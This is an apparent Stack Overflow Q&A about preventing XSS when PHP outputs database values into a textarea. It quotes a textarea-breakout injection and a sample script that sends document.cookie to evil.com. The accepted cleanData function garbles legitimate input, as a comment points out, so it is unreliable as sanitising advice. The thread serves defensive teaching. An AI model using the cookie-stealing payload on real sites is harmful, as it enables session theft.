# Sanitizing Output To Textarea From XSS

Tags: php, css, textarea, xss, sanitize

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?

For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.

When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in

```
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
```

) and cause problems.

Thanks!

Comment: Since you mentioned `mysql_real_escape_string()`, I'm assuming you want to do this with PHP?

Answer (score 6, accepted):

I think i would prefer a combo of `filter_var` and `url_decode` if you want to use a pure simple php Solution

### Reason

Imagine an impute like this

```
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
```

If i use `strip_tags`

```
var_dump(strip_tags($maliciousCode));
```

Output

```
string 'document.write("' (length=16)
```

if i use `htmlspecialchars`

```
var_dump(htmlspecialchars($maliciousCode));
```

Output

```
string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)
```

### My Choice

```
function cleanData($str) {
    $str = urldecode ($str );
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str ;
}

$input = cleanData ( $maliciousCode );
var_dump($input);
```

Output

```
 string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)
```

If form is using `GET` instead of `POST` some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless

The are also enough class online to help you do filter see

- http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
- http://htmlpurifier.org/

Comment: why not "addslashes" ?

Comment: Unfortunatly this does not allow several characters to get through such as <>&. If hte user for example writes the text '1<2' it would be corrupted on output.

Answer (score 2):

[HTMLpurifier](http://htmlpurifier.org/) is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using [`htmlspecialchars()`](https://www.php.net/manual/en/function.htmlspecialchars.php) is recommended for outputting user-provided content.

Answer (score 0):

After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input.It now also covers multi-line textarea input

I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.

```
function clean_text($text, $html = true)
{ if($text == ""){return "";}
  $text = nl2br($text,false); // false gives <br>, true gives <br />
  $textary = explode("<br>",$text);
  foreach($textary as $key => $val)
  { $val = trim($val);
    $val = stripslashes($val);
    $val = htmlspecialchars($val);
    $textary[$key] = $val;
  }
  if ($html)
  { return implode("<br />",$textary);} //return implode("<br>",$textary);
  else
  { return implode("\r\n",$textary);}
}
```

By the way... Thanks SO members for being part of my learning PHP.

Example at http://www.microcal.ca/scripts/cleantext.php